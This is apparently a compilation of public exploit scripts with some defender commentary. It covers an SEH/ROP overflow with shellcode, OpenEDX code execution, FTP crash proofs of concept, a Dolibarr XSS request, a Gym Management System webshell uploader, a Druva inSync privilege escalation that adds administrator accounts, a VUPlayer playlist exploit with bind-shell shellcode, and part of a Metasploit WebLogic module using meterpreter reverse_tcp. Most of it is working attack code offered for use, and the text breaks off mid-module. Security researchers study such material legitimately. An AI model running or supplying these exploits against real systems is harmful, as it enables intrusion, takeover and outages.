buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7"
buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6"
buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1"
buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde"
buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4"
buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16"
buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08"
buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e"
buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae"
buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58"
buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b"
buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb"
buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d"
buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd"
buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b"

##########
# Layout: 1604 bytes of 'A', the ROP chain, 16 NOPs, the shellcode, then 'C'
# padding up to 2236 bytes, followed by the 4-byte SEH overwrite.
junk1 = "\x41"*1604
nops = "\x90"*16
junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1))
seh = struct.pack('L',0x6998fb2e)  # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll]
payload = junk1 + rop + nops + buf + junk2 + seh

try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,8888))
    s.send(payload)
except Exception as e:
    print(sys.exc_value)
-
OpenEDX platform Ironwood 2.5 - Remote Code Execution
# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution # Google Dork: N/A # Date: 2020-05-20 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://open.edx.org/ # Software Link: https://github.com/edx/edx-platform # Version: Ironwood 2.5 # Tested on: Debian x64 # CVE : CVE-2020-13144 CVE ID: CVE-2020-13144 OpenEDX Platform Ironwood version 2.5 suffers from an RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced. This is an authenticated vulnerability, so you need to register an account and go to /edx-studio. Then: Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code. Once there, we just need to edit the problem and introduce a payload such as: <problem> <script type="python"> def test_add(expect,ans): import os os.system("thecommandyouwanttoexecute") </script> <p>Problem text</p> <customresponse cfn="test_add" expect="20"> <textline size="10" correct_answer="11" label="Integer #1"/><br/> <textline size="10" correct_answer="9" label="Integer #2"/> </customresponse> <solution> <div class="detailed-solution"> <p>Solution or Explanation Heading</p> <p>Solution or explanation text</p> </div> </solution> </problem> Then click Submit, and the command is executed on the machine.
-
Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
# Exploit Title: Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
# Date: 2020-05-16
# Found by: Alvaro J. Gene (Socket_0x03)
# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: NLST
# Tested on: Windows 7 SP1
# Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server
# "Konica Minolta FTP Utility" that allows an attacker to overwrite some registers,
# such as EAX, ESI, EDI... Even though the following code only crashes the FTP server and
# overwrites some registers, the vulnerable command could be used to build a remote buffer
# overflow exploit that compromises the system without any user interaction.
====================================================================================================
=============== [ Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) ] ===============
====================================================================================================

# PoC: log in anonymously (ftp.login() with no arguments uses ftplib's anonymous
# defaults) and issue NLST with a 1500-byte argument of 'A'.
# Defender note: an NLST argument this long is never a legitimate path; an FTP log
# entry with an oversize NLST argument followed by the service dying is the indicator.
from ftplib import FTP
ftp = FTP('192.168.0.16')  # author's lab host (private address)
buffer = "A" * 1500
ftp.login()
ftp.retrlines('NLST ' + buffer)
-
Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)
# Exploit Title: Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)
# Date: 2020-05-16
# Found by: Alvaro J. Gene (Socket_0x03)
# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: LIST
# Tested on: Windows 7 SP1
# Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
# "Konica Minolta FTP Utility" that allows an attacker to overwrite some registers,
# such as EAX, ESI, EDI... Even though the following code only crashes the FTP server and
# overwrites some registers, the vulnerable command could be used to build a remote buffer
# overflow exploit that compromises the system without any user interaction.
====================================================================================================
=============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] ===============
====================================================================================================

# PoC: identical to the NLST variant except for the verb — anonymous login
# (ftp.login() with no arguments) and LIST with a 1500-byte argument of 'A'.
# Defender note: a LIST argument this long is never a legitimate path; an FTP log
# entry with an oversize LIST argument followed by the service dying is the indicator.
from ftplib import FTP
ftp = FTP('192.168.0.16')  # author's lab host (private address)
buffer = "A" * 1500
ftp.login()
ftp.retrlines('LIST ' + buffer)
-
Filetto 1.0 - 'FEAT' Denial of Service (PoC)
# Exploit Title: Filetto 1.0 - 'FEAT' Denial of Service (PoC)
# Date: 2020-05-13
# Found by: Alvaro J. Gene (Socket_0x03)
# Vendor Homepage: http://www.utillyty.eu
# Software Link: https://sourceforge.net/projects/filetto
# Vulnerable Application: Filetto
# Version: 1.0 (last version. Updated: 01/31/2020)
# Server: FTP Server
# Vulnerable Command: FEAT
# Tested on: Windows 7 SP1
====================================================================================================
======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] =========================
====================================================================================================
# Python 2 script (print statement). Sends a single FEAT command with a very long argument.
from socket import *
host = "192.168.0.14"      # author's lab target
port = 2021                # non-default FTP port used in the author's setup
username = "Socket_0x03"
password = "password"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)         # server banner
# The PoC authenticates before sending FEAT, so what it demonstrates is a post-authentication
# crash; it does not show whether the same code path is reachable without credentials.
s.send("USER %s\r\n" % (username))
print s.recv(1024)
s.send("PASS %s\r\n" % (password))
print s.recv(1024)
# FEAT takes no argument at all (RFC 2389). Here the verb is followed by 11008 copies of
# "A," (22016 bytes). Defensive fix: reject or truncate arguments on argument-less verbs and
# bound line length before copying; a FEAT line longer than the verb itself is anomalous.
buffer = "FEAT "
buffer += "\x41\x2c" * 11008
buffer += "\r\n"
s.send(buffer)
print s.recv(1024)         # empty or an error if the server has already crashed
s.close()
-
Dolibarr 11.0.3 - Persistent Cross-Site Scripting
# Title: Dolibarr 11.0.3 - Persistent Cross-Site Scripting # Author: Mehmet Kelepce / Gais Cyber Security # Date : 2020-04-14 # Vendor: https://www.dolibarr.org/ # Exploit-DB Author ID: 8763 # Remotely Exploitable: Yes # Dynamic Coding Language: PHP # CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L) # Bug: XSS - Cross Site Scripting # CVE: ## this vulnerability was found by examining the source code. PoC : Dolibarr 11.0.3 LDAP Synchronization Settings - HTTP POST REQUEST ########################################################## POST /dolibarr/admin/ldap.php?action=setvalue HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/admin/ldap.php?action=test Content-Type: application/x-www-form-urlencoded Content-Length: 723 Connection: close Cookie: DOLSESSID_08b25d38fe3d8c5d83c5477f93783b26=abml2gjafuuqcos5lm1053tqu6; DOLINSTALLNOPING_b832abc1aadf61021c84b3def6cdf1e6=0 Upgrade-Insecure-Requests: 1 token=%242y%2410%245CjT4.D4w8Qe.uaL.pHuSeDOW9PB2gnNQ7MhYrYUt7W8hq2R3oXBe&activesynchro=0&activecontact=0&type=activedirectory&LDAP_SERVER_PROTOCOLVERSION=3&host=%22%3E%3CEMBED+SRC%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4%3D%22+type%3D%22image%2Fsvg%2Bxml%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E&slave=&port=389&dn=&usetls=0&admin=&pass= Vulnerable parameters: host,slave,port Payload (base64): 
PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4= Payload (decode) : <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert('Hello, Dolibarr!');</script></svg> Parameter file: /dolibarr/admin/ldap.php ## Risk : cookie information of the target user is obtained.
-
Gym Management System 1.0 - Unauthenticated Remote Code Execution
# Exploit Title: Gym Management System 1.0 - Unauthenticated Remote Code Execution # Exploit Author: Bobby Cooke # Date: 2020-05-21 # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/ # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Exploit Tested Using: Python 2.7.17 # Vulnerability Description: # Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access the '/upload.php' page, as it does not check for an authenticated user session. # 2. Set the 'id' parameter of the GET request to the desired file name for the uploaded PHP file. # - `upload.php?id=kamehameha` # /upload.php: # 4 $user = $_GET['id']; # 34 move_uploaded_file($_FILES["file"]["tmp_name"], # 35 "upload/". $user.".".$ext); # 3. Bypass the extension whitelist by adding a double extension, with the last one as an acceptable extension (png). # /upload.php: # 5 $allowedExts = array("jpg", "jpeg", "gif", "png","JPG"); # 6 $extension = @end(explode(".", $_FILES["file"]["name"])); # 14 && in_array($extension, $allowedExts)) # 4. Bypass the file type check by modifying the 'Content-Type' of the 'file' parameter to 'image/png' in the POST request, and set the 'pupload' parameter to 'upload'. # 7 if(isset($_POST['pupload'])){ # 8 if ((($_FILES["file"]["type"] == "image/gif") # 11 || ($_FILES["file"]["type"] == "image/png") # 5. In the body of the 'file' parameter of the POST request, insert the malicious PHP code: # <?php echo shell_exec($_GET["telepathy"]); ?> # 6. The Web Application will rename the file to have the extension with the second item in an array created from the file name; separated by the '.' character.
# 30 $pic=$_FILES["file"]["name"];
# 31 $conv=explode(".",$pic);
# 32 $ext=$conv['1'];
# - Our uploaded file name was 'kaio-ken.php.png'. Therefore $conv['0']='kaio-ken'; $conv['1']='php'; $conv['2']='png';
# 7. Communicate with the webshell at '/upload.php?id=kamehameha' using GET Requests with the telepathy parameter.
#
# Root cause, as the quoted upload.php lines show: the allow-list check (lines 6/14) looks at
# the LAST dot-separated element of the client-supplied file name, the stored extension
# (line 32) is taken from the SECOND element, and the MIME check (lines 8-11) trusts the
# client-supplied Content-Type. Server-side fix: derive a single extension from the final
# element, compare it case-insensitively against the allow-list, ignore the client MIME type
# (sniff the bytes instead), write uploads under a server-generated name outside the web
# root, and require an authenticated session on upload.php.
#
# Python 2 script (print statements, raw_input). colorama is a third-party dependency.
import requests, sys, urllib, re
from colorama import Fore, Back, Style
# Silences the warning for the verify=False calls below: TLS certificate validation is
# disabled for every request this script makes.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def webshell(SERVER_URL, session):
    """Interactive command loop against the uploaded file.

    SERVER_URL: base URL of the application (with trailing slash, as in the usage example).
    session:    the requests.Session used for the upload; only the first probe reuses it.
    Does not return normally: the loop runs until an exception, then the process exits.
    For defenders, the observable pattern is a series of GET requests to a file under
    /upload/ that did not exist a moment earlier.
    """
    try:
        WEB_SHELL = SERVER_URL+'upload/kamehameha.php'
        # Probe: `echo %CD%` confirms the file executes and returns the working directory.
        getdir = {'telepathy': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        # Expects a Windows-style path starting with drive letter C-F; cwd[0] raises
        # IndexError (caught below) when the response contains no such line.
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = raw_input(term)
            command = {'telepathy': thought}
            # NOTE(review): this uses the module-level requests.get rather than `session`,
            # so cookies obtained during the upload are not sent with later commands.
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        # Bare except: also swallows Ctrl-C (KeyboardInterrupt) and any HTTPError raised above.
        print("\r\nExiting.")
        sys.exit(-1)
def formatHelp(STRING):
    """Wrap STRING in bright red for the usage message."""
    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
def header():
    """Return the coloured ASCII-art banner printed at start-up."""
    BL = Style.BRIGHT+Fore.GREEN
    RS = Style.RESET_ALL
    FR = Fore.RESET
    SIG = BL+' /\\\n'+RS
    SIG += Fore.YELLOW+'/vvvvvvvvvvvv '+BL+'\\'+FR+'--------------------------------------,\n'
    SIG += Fore.YELLOW+'`^^^^^^^^^^^^'+BL+' /'+FR+'============'+Fore.RED+'BOKU'+FR+'====================="\n'
    SIG += BL+' \/'+RS+'\n'
    return SIG
if __name__ == "__main__":
    print header();
    if len(sys.argv) != 2:
        print formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0])
        print formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/gym/'" % sys.argv[0])
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    # The 'id' query parameter becomes the stored file's base name (upload.php lines 4/35).
    UPLOAD_DIR = 'upload.php?id=kamehameha'
    UPLOAD_URL = SERVER_URL + UPLOAD_DIR
    s = requests.Session()
    # Initial GET, presumably to pick up any session cookie the application sets -- confirm.
    s.get(SERVER_URL, verify=False)
    # Seven bytes; the eighth byte of the PNG signature (\n) comes from the '\n' appended below.
    PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
    png = {
        'file': (
            'kaio-ken.php.png',   # allow-list sees 'png'; server stores it as 'php' (see header)
            PNG_magicBytes+'\n'+'<?php echo shell_exec($_GET["telepathy"]); ?>',
            'image/png',          # client-chosen Content-Type, which the server trusts
            {'Content-Disposition': 'form-data'}
        )
    }
    fdata = {'pupload': 'upload'}  # upload.php line 7 gates processing on this POST field
    r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
    # NOTE(review): r1 is never inspected; a failed upload only surfaces when webshell() probes.
    webshell(SERVER_URL, s)
-
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation
# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation
# Date: 2020-05-21
# Exploit Author: Matteo Malvica
# Credits: Chris Lyne for previous version's exploit
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 1909-18363.778
# CVE: CVE-2020-5752
# Command injection in inSyncCPHwnet64 RPC service
# Runs as nt authority\system. so we have a local privilege escalation
# The path validation has been only implemented through a 'strncmp' function which can be bypassed by
# appending a directory traversal escape sequence at the end of the valid path.
# Writeup: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
# Example usage:
#python insync.py "windows\system32\cmd.exe /C net user Leon /add"
#python insync.py "windows\system32\cmd.exe /C net localgroup Administrators Leon /add"
#
# Python 2 script (print statements). Talks to the local RPC service over loopback and asks
# it to start a process; the only input is the command line given on argv.
import socket
import struct
import sys
if len(sys.argv) < 2:
    print "Usage: " + __file__ + " <quoted command to execute>"
    print "E.g. " + __file__ + " \"net user /add tenable\""
    sys.exit(0)
# The service is reached on TCP 6064 over loopback only, so this is a local primitive.
ip = '127.0.0.1'
port = 6064
# Per the header, the service only checks that the path *starts with* its own install
# directory (strncmp), so a traversal suffix leaves that prefix intact while escaping it.
# Defensive fix: canonicalize the full path (e.g. GetFullPathName) before comparing, or
# better, accept an allow-listed operation rather than a caller-supplied path.
command_line = 'C:\\ProgramData\\Druva\\inSync4\\..\\..\\..\\..\\..\\..\\..\\..\\' + sys.argv[1]
def make_wide(str):
    """Interleave a NUL byte after every character of `str`.

    For ASCII input this yields the UTF-16LE ("wide string") byte layout Windows expects;
    it is not UTF-8 as the original comment said, and it does not handle non-ASCII input.
    The parameter name shadows the builtin str.
    """
    new_str = ''
    for c in str:
        new_str += c
        new_str += '\x00'
    return new_str
hello = "inSync PHC RPCW[v0002]"   # protocol banner / version tag sent first
func_num = "\x05\x00\x00\x00" # 05 is to run a command, passed as an argument to CreateProcessW (per header)
command_line = make_wide(command_line) # widen to UTF-16LE bytes, see make_wide()
command_length = struct.pack('<i', len(command_line)) # byte length of the widened string, little-endian int32
requests = [ hello, func_num, command_length, command_line ] # sent as four separate writes, in this order
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
i = 1
for req in requests:
    print 'Sending request' + str(i)
    sock.send(req)
    i += 1
sock.close()
# Detection angle (inferred from the header, confirm in your environment): a child process
# of the inSync service running as SYSTEM with an image path outside the product's directory.
print "Done."
-
VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR)
# Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR)
# Date: 2020-05-22
# Exploit Author: Gobinathan L
# Vendor Homepage: http://www.vuplayer.com/
# Version: v2.49
# Tested on: Windows 7 Professional with ASLR and Full DEP Turned ON.
# Usage : $ python <exploit>.py
#===================================[ VUPlayer 2.49 Exploit Generator ]======================================#
# Python 2 file generator: writes a crafted .m3u playlist to the current directory. Nothing
# is sent anywhere; the file has to be opened in the player on the test machine.
import struct
# msfvenom -p windows/shell_bind_tcp exitfunc=thread -b "\x00\x0a\x0d\x1a" -f c
# Bind-shell payload (port 4444, per the message printed below). The excluded bytes are the
# ones a text/playlist parser treats as terminators: NUL, LF, CR and EOF (0x1a).
shell = ("\xd9\xc9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbd\xa9\xc1\xbf"
"\xb1\x83\xc2\x04\x31\x6a\x13\x03\xc3\xd2\x5d\x44\xef\x3d\x23"
"\xa7\x0f\xbe\x44\x21\xea\x8f\x44\x55\x7f\xbf\x74\x1d\x2d\x4c"
"\xfe\x73\xc5\xc7\x72\x5c\xea\x60\x38\xba\xc5\x71\x11\xfe\x44"
"\xf2\x68\xd3\xa6\xcb\xa2\x26\xa7\x0c\xde\xcb\xf5\xc5\x94\x7e"
"\xe9\x62\xe0\x42\x82\x39\xe4\xc2\x77\x89\x07\xe2\x26\x81\x51"
"\x24\xc9\x46\xea\x6d\xd1\x8b\xd7\x24\x6a\x7f\xa3\xb6\xba\xb1"
"\x4c\x14\x83\x7d\xbf\x64\xc4\xba\x20\x13\x3c\xb9\xdd\x24\xfb"
"\xc3\x39\xa0\x1f\x63\xc9\x12\xfb\x95\x1e\xc4\x88\x9a\xeb\x82"
"\xd6\xbe\xea\x47\x6d\xba\x67\x66\xa1\x4a\x33\x4d\x65\x16\xe7"
"\xec\x3c\xf2\x46\x10\x5e\x5d\x36\xb4\x15\x70\x23\xc5\x74\x1d"
"\x80\xe4\x86\xdd\x8e\x7f\xf5\xef\x11\xd4\x91\x43\xd9\xf2\x66"
"\xa3\xf0\x43\xf8\x5a\xfb\xb3\xd1\x98\xaf\xe3\x49\x08\xd0\x6f"
"\x89\xb5\x05\x05\x81\x10\xf6\x38\x6c\xe2\xa6\xfc\xde\x8b\xac"
"\xf2\x01\xab\xce\xd8\x2a\x44\x33\xe3\x45\xc9\xba\x05\x0f\xe1"
"\xea\x9e\xa7\xc3\xc8\x16\x50\x3b\x3b\x0f\xf6\x74\x2d\x88\xf9"
"\x84\x7b\xbe\x6d\x0f\x68\x7a\x8c\x10\xa5\x2a\xd9\x87\x33\xbb"
"\xa8\x36\x43\x96\x5a\xda\xd6\x7d\x9a\x95\xca\x29\xcd\xf2\x3d"
"\x20\x9b\xee\x64\x9a\xb9\xf2\xf1\xe5\x79\x29\xc2\xe8\x80\xbc"
"\x7e\xcf\x92\x78\x7e\x4b\xc6\xd4\x29\x05\xb0\x92\x83\xe7\x6a"
"\x4d\x7f\xae\xfa\x08\xb3\x71\x7c\x15\x9e\x07\x60\xa4\x77\x5e"
"\x9f\x09\x10\x56\xd8\x77\x80\x99\x33\x3c\xa0\x7b\x91\x49\x49"
"\x22\x70\xf0\x14\xd5\xaf\x37\x21\x56\x45\xc8\xd6\x46\x2c\xcd"
"\x93\xc0\xdd\xbf\x8c\xa4\xe1\x6c\xac\xec")
# Overwrites the saved return address with a RET gadget so execution slides into the chain.
# NOTE(review): every address in this file is a fixed 0x10xxxxxx constant taken, per the
# inline comments, from BASS.dll / BASSWMA.dll. Hard-coded addresses only work if those
# modules load at a fixed base, i.e. they were not built with ASLR support; the defensive
# takeaway is to build and ship every dependency with /DYNAMICBASE so DEP cannot be bypassed
# this way.
ret = struct.pack("<I", 0x10010158)
def create_rop_chain():
    """Return the DEP-bypass chain as a string of packed little-endian DWORDs.

    From the inline comments the chain appears to stage VirtualProtect's arguments in
    registers (size 0x201, new protection 0x40 = PAGE_EXECUTE_READWRITE, a writable
    scratch address for the old-protection out-parameter), then PUSHAD lays them out on
    the stack and the final JMP ESP transfers into the NOP sled that follows.
    """
    rop_gadgets = [
        0x100106e1, #POP EBP RET
        0x100106e1, #Ptr to POP EBP RET popped into EBP
        0x10015f82, #POP EAX RET
        0xfffffdff, #Value to Negate.. result in 0x201
        0x10014db4, #NEG EAX RET
        0x10032f72, #XCHG EAX, EBX RET
        0x10015f82, #POP EAX RET
        0xffffffc0, #Value to negate ..result in 0x40
        0x10014db4, #NEG EAX RET
        0x10038a6d, #XCHG EAX, EDX RET
        0x106053e5, #POP ECX RET
        0x101082cc, #Random Location with Write Access
        0x1001621c, #POP EDI RET
        0x10010158, #RET will be stored in EDI
        0x10604154, #POP ESI RET
        0x10101c02, #JMP [EAX]
        0x10015f77, # POP EAX # RETN [BASS.dll]
        0x10109270, # ptr to &VirtualProtect() [IAT BASSWMA.dll]
        0x1001d7a5, # PUSHAD # RETN
        0x10022aa7, # JMP ESP
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
shellcode = "\x90"*32 + shell              # 32-byte NOP sled ahead of the payload
buffer = "A"*1012                          # padding up to the saved return address
buffer+= ret
buffer+= rop_chain
buffer+= shellcode
buffer+= "\x90"*(2500 - len(buffer))       # pad the playlist entry out to 2500 bytes
try:
    # Text-mode write of a str: correct only on Python 2, where str is a byte string.
    f = open("exploit.m3u", "w")
    f.write(buffer)
    print("[+] Payload Generated Successfully.")
    print("[+] Check for Open Port [4444] on Target Machine. A Bind shell is waiting for you..")
    f.close()
except:
    # NOTE(review): the bare except hides the real error (e.g. permission denied) and leaks
    # the handle if write() fails after open() succeeded; a with-block would close it.
    print("[-] Couldn't Generate Payload.")
-
WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException', 'Description' => %q{ There exists a Java object deserialization vulnerability in multiple versions of WebLogic. Unauthenticated remote code execution can be achieved by sending a serialized BadAttributeValueExpException object over the T3 protocol to vulnerable WebLogic servers. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jang', # Vuln Discovery 'Y4er', # PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'CVE', '2020-2555' ], [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ], [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ] ], 'Platform' => %w[unix linux win], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Privileged' => false, 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } } ], [ 'Unix', { 'Platform' => %w[unix linux], 'CmdStagerFlavor' => 'printf', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } } ], ], 'DisclosureDate' => '2020-01-15', 'DefaultTarget' => 0 ) ) register_options([ Opt::RPORT(7001) ]) end def check connect web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n" sock.put(web_req) sleep(2) res = sock.get_once versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ] return CheckCode::Unknown('Failed to obtain response from service') unless res 
/WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res return CheckCode::Unknown('Failed to detect WebLogic') unless version @version_no = Gem::Version.new(version) print_status("WebLogic version detected: #{@version_no}") return CheckCode::Appears if versions.include?(@version_no) CheckCode::Detected('Version of WebLogic is not vulnerable') ensure disconnect end def exploit super connect print_status('Sending handshake...') t3_handshake if target.name == 'Windows' win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true }) win_obj.prepend('cmd.exe /c ') win_obj = build_payload_obj(win_obj) t3_send(win_obj) else execute_cmdstager end ensure disconnect end def t3_handshake # t3 12.2.1\nAS:255 # \nHL:19\nMS:100000 # 00\n\n shake = '74332031322e322e310a41533a323535' shake << '0a484c3a31390a4d533a313030303030' shake << '30300a0a' sock.put([shake].pack('H*')) sleep(1) sock.get_once end def build_payload_obj(payload_data) payload_obj = 'aced' # STREAM_MAGIC payload_obj << '0005' # STREAM_VERSION payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002e' # Class name length: 46 payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException payload_obj << '67656d656e742e426164' payload_obj << '41747472696275746556' payload_obj << '616c7565457870457863' payload_obj << '657074696f6e' payload_obj << 'd4e7daab632d4640' # SerialVersionUID payload_obj << '020001' # Serialization flag, field num = 1 payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3 payload_obj << '76616c' # Field name: val payload_obj << '740012' # String, length: 18 payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object; payload_obj << '7872' # end block data, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e6c616e672e' # java.lang.Exception payload_obj << '457863657074696f6e' payload_obj << 'd0fd1f3e1a3b1cc4' # 
